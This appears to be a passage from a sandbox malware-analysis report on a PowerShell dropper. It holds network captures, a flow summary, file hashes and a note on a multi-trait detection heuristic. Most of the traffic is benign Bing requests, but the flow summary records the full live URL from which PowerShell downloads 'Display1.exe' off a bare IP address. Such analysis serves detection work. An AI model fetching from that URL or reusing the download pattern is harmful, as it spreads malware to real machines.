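Any one trait alone is noisy (internal tooling talks to bare IPs, CDNs serve octet-stream), which is why the example requires several to coincide; the dropper's flow hits all seven while both Bing flows score zero.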
-
DNS  8.8.8.8:53
  Request:  g.bing.com IN A
  Response: g.bing.com IN CNAME g-bing-com.dual-a-0034.a-msedge.net
            g-bing-com.dual-a-0034.a-msedge.net IN CNAME dual-a-0034.a-msedge.net
            dual-a-0034.a-msedge.net IN A 204.79.197.237
            dual-a-0034.a-msedge.net IN A 13.107.21.237
-
DNS  8.8.8.8:53
  Request:  244.67.156.94.in-addr.arpa IN PTR
  Response: -
-
HTTP  GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=
Remote address: 204.79.197.237:443
Request:
GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
Response:
HTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=11DD43C306FA6C7724A0570A07DD6DF8; domain=.bing.com; expires=Thu, 21-Aug-2025 09:40:23 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 1EA0C797C2394F21ABCB740B17F38FC4 Ref B: LON04EDGE0614 Ref C: 2024-07-27T09:40:23Z
date: Sat, 27 Jul 2024 09:40:22 GMT
-
HTTP  GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=
Remote address: 204.79.197.237:443
Request:
GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=11DD43C306FA6C7724A0570A07DD6DF8
Response:
HTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=lUR2t-R3pzz_JvIerSdSItBBMBWqRBqXLOZ--K7TqLM; domain=.bing.com; expires=Thu, 21-Aug-2025 09:40:23 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: C9C77E08551E4C50802603FF473BD1C3 Ref B: LON04EDGE0614 Ref C: 2024-07-27T09:40:23Z
date: Sat, 27 Jul 2024 09:40:22 GMT
-
HTTP  GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=
Remote address: 204.79.197.237:443
Request:
GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=11DD43C306FA6C7724A0570A07DD6DF8; MSPTC=lUR2t-R3pzz_JvIerSdSItBBMBWqRBqXLOZ--K7TqLM
Response:
HTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: EC06ACEB9EBB42CABFBC613FF00ADF67 Ref B: LON04EDGE0614 Ref C: 2024-07-27T09:40:23Z
date: Sat, 27 Jul 2024 09:40:22 GMT
-
DNS  8.8.8.8:53
  Request:  237.197.79.204.in-addr.arpa IN PTR
  Response: -
-
DNS  8.8.8.8:53
  Request:  17.160.190.20.in-addr.arpa IN PTR
  Response: -
-
DNS  8.8.8.8:53
  Request:  55.36.223.20.in-addr.arpa IN PTR
  Response: -
-
DNS  8.8.8.8:53
  Request:  228.249.119.40.in-addr.arpa IN PTR
  Response: -
-
DNS  8.8.8.8:53
  Request:  183.142.211.20.in-addr.arpa IN PTR
  Response: -
-
DNS  8.8.8.8:53
  Request:  26.165.165.52.in-addr.arpa IN PTR
  Response: -
-
DNS  8.8.8.8:53
  Request:  56.126.166.20.in-addr.arpa IN PTR
  Response: -
-
DNS  8.8.8.8:53
  Request:  217.135.221.88.in-addr.arpa IN PTR
  Response: 217.135.221.88.in-addr.arpa IN PTR a88-221-135-217.deploy.static.akamaitechnologies.com
-
DNS  8.8.8.8:53
  Request:  tse1.mm.bing.net IN A
  Response: tse1.mm.bing.net IN CNAME mm-mm.bing.net.trafficmanager.net
            mm-mm.bing.net.trafficmanager.net IN CNAME ax-0001.ax-msedge.net
            ax-0001.ax-msedge.net IN A 150.171.28.10
            ax-0001.ax-msedge.net IN A 150.171.27.10
-
HTTP  GET https://tse1.mm.bing.net/th?id=OADD2.10239340418590_1Z5SLYPYIFLU5OB7B&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
Remote address: 150.171.28.10:443
Request:
GET /th?id=OADD2.10239340418590_1Z5SLYPYIFLU5OB7B&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
Response:
HTTP/2.0 200
content-length: 525311
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: D322E6E5001B4C96AD331F29DFBBF045 Ref B: LON04EDGE1215 Ref C: 2024-07-27T09:42:07Z
date: Sat, 27 Jul 2024 09:42:06 GMT
-
HTTP  GET https://tse1.mm.bing.net/th?id=OADD2.10239339388057_1GGG85785BK7BP6Y7&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
Remote address: 150.171.28.10:443
Request:
GET /th?id=OADD2.10239339388057_1GGG85785BK7BP6Y7&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
Response:
HTTP/2.0 200
content-length: 589683
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 2FDB249C2C7A47CA908B83FB37FF85DB Ref B: LON04EDGE1215 Ref C: 2024-07-27T09:42:07Z
date: Sat, 27 Jul 2024 09:42:06 GMT
-
HTTP  GET https://tse1.mm.bing.net/th?id=OADD2.10239340418589_1A7GR0X7EOYKFPJ56&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
Remote address: 150.171.28.10:443
Request:
GET /th?id=OADD2.10239340418589_1A7GR0X7EOYKFPJ56&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
Response:
HTTP/2.0 200
content-length: 592830
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: B34D85E3DFFA43C5AAFE69D8AD8FB4AC Ref B: LON04EDGE1215 Ref C: 2024-07-27T09:42:07Z
date: Sat, 27 Jul 2024 09:42:06 GMT
-
HTTP  GET https://tse1.mm.bing.net/th?id=OADD2.10239339388056_1O9WMGQV7BVEGHO4D&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
Remote address: 150.171.28.10:443
Request:
GET /th?id=OADD2.10239339388056_1O9WMGQV7BVEGHO4D&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
Response:
HTTP/2.0 200
content-length: 575578
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: F5BCBD33E8C04898B812E1FADA2EEAF5 Ref B: LON04EDGE1215 Ref C: 2024-07-27T09:42:07Z
date: Sat, 27 Jul 2024 09:42:06 GMT
-
DNS  8.8.8.8:53
  Request:  66.112.168.52.in-addr.arpa IN PTR
  Response: -
-
Flow summary (columns: destination, protocol, process, bytes out, bytes in, packets out, packets in; "-" where the summary lists no destination)

94.156.67.244:5679  http  PoWersheLl.exe  12.7kB  648.7kB  257  467
  URL: http://94.156.67.244:5679/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe
  HTTP Request:  GET http://94.156.67.244:5679/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe
  HTTP Response: 200
-
204.79.197.237:443  tls, http2  2.0kB  9.4kB  22  20
  URL: https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=
  HTTP Request:  GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=
  HTTP Response: 204
  HTTP Request:  GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=
  HTTP Response: 204
  HTTP Request:  GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=
  HTTP Response: 204
-
-  260 B  5
-
-  1.2kB  6.9kB  15  13
-
-  1.2kB  6.9kB  15  13
-
150.171.28.10:443  tls, http2  80.1kB  2.4MB  1716  1712
  URL: https://tse1.mm.bing.net/th?id=OADD2.10239339388056_1O9WMGQV7BVEGHO4D&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
  HTTP Request:  GET https://tse1.mm.bing.net/th?id=OADD2.10239340418590_1Z5SLYPYIFLU5OB7B&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
  HTTP Request:  GET https://tse1.mm.bing.net/th?id=OADD2.10239339388057_1GGG85785BK7BP6Y7&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
  HTTP Request:  GET https://tse1.mm.bing.net/th?id=OADD2.10239340418589_1A7GR0X7EOYKFPJ56&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
  HTTP Request:  GET https://tse1.mm.bing.net/th?id=OADD2.10239339388056_1O9WMGQV7BVEGHO4D&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
  HTTP Response: 200
  HTTP Response: 200
  HTTP Response: 200
  HTTP Response: 200
-
-  1.2kB  6.9kB  15  13
-
-  260 B  5
-
-  dns  73 B  147 B  1  1
  DNS Request: 217.106.137.52.in-addr.arpa
-
-  dns  74 B  128 B  1  1
  DNS Request: 172.214.232.199.in-addr.arpa
-
-  dns  128 B  283 B  2  2
  DNS Request:  g.bing.com
  DNS Response: 204.79.197.237, 13.107.21.237
  DNS Request:  244.67.156.94.in-addr.arpa
-
-  dns  73 B  143 B  1  1
  DNS Request: 237.197.79.204.in-addr.arpa
-
-  dns  72 B  158 B  1  1
  DNS Request: 17.160.190.20.in-addr.arpa
-
-  dns  71 B  157 B  1  1
  DNS Request: 55.36.223.20.in-addr.arpa
-
-  dns  73 B  159 B  1  1
  DNS Request: 228.249.119.40.in-addr.arpa
-
-  dns  73 B  159 B  1  1
  DNS Request: 183.142.211.20.in-addr.arpa
-
-  dns  72 B  146 B  1  1
  DNS Request: 26.165.165.52.in-addr.arpa
-
-  dns  72 B  158 B  1  1
  DNS Request: 56.126.166.20.in-addr.arpa
-
-  dns  73 B  139 B  1  1
  DNS Request: 217.135.221.88.in-addr.arpa
-
-  dns  62 B  170 B  1  1
  DNS Request:  tse1.mm.bing.net
  DNS Response: 150.171.28.10, 150.171.27.10
-
-  dns  72 B  146 B  1  1
  DNS Request: 66.112.168.52.in-addr.arpa
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 522B
MD5: 8334a471a4b492ece225b471b8ad2fc8
SHA1: 1cb24640f32d23e8f7800bd0511b7b9c3011d992
SHA256: 5612afe347d8549cc95a0c710602bcc7d7b224361b613c0a6ba362092300c169
SHA512: 56ae2e83355c331b00d782797f5664c2f373eac240e811aab978732503ae05eb20b08730d2427ed90efa5a706d71b42b57153596a45a6b5592e3dd9128b81c36
-
Filesize: 614KB
MD5: 88696cf17417a2339b63f9452404c839
SHA1: 2123ca0e3764ba65e421d3b5dd7453da955d36f2
SHA256: a5f629e62e8012c0ead81b462bc05ec9d20395af3121f87961f9d2dfde908895
SHA512: a4236f6d52b985420dc733998842815fd24f12236bdbf3b885ed9a15c0d4815dec439cf919925b4b903ac158aba1ba2a8bf9eff20af7134d2e4edbce226f7931
-
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize: 1KB
MD5: 7f90f475aa13b8540625a0f2f6c5cb87
SHA1: aa27ff559a0ceb702c9acd3215fa9d8f1bf4ad18
SHA256: aad12eaef3d9e22bbde72db89ca3dbdd7adf278042ea0ecbb9013302993481a0
SHA512: 0f484824f1f72abc0f3adc20473e2f20afee0a17cce13bc04a5ba1f3a64b514e0e87dafbd4adb4fe664dd28c6d533e1f264e15fca93d68965aa99784f526e6f2
-
Filesize: 251KB
MD5: dcb591d1fc03274934709e24b502d719
SHA1: 9d4172d007347a9aa54b48cb5a214a792ad03708
SHA256: c7e67928407dc0d2fe2a61e10e2f97104986770b6ba6e59f8faa7b6fcc595028
SHA512: 1d6748bdd0bbfbe4d1f15dde0af015fb08814ffc3360b215d4f56844b15ae1d4b29ade922678439c3a07f1fa41da287a1054b0eb5853a761ae2fabb4b08b2800
-
Filesize: 474KB
MD5: 642a150be5bbed12c85dff794b955c01
SHA1: 115de36f192e2bb10ec7c2c8bba9bf3dd639b461
SHA256: ded2b1a499ba8ac097361b01b1e56bdaa67769c0b7130489af489bef58cb5dfc
SHA512: d4a8249bc53bd070bfb8c0cdd703980ac4b12e0a0354a31333d7bf0af089edc1317c3005e99cdd3247b883ce72d10158e928d54664941010ee884fb4a5b1ce42
-
Filesize: 18KB
MD5: fa0fdc18cccb4a2fb162362848d10d73
SHA1: 9ccab8577c310e19e1299fb7fcad538c72a36420
SHA256: c3f004c34695080e75df6dccc39dae9e269eba7164aa0f95b9964078973f3736
SHA512: fcce03713d22d8831cb8f792c9e367aeb4d3714ffb89f148f2b64ae32bb066f7ab0b5ea58778309a86584af8169a75bb7325ba6505567881bd330cdead222fd3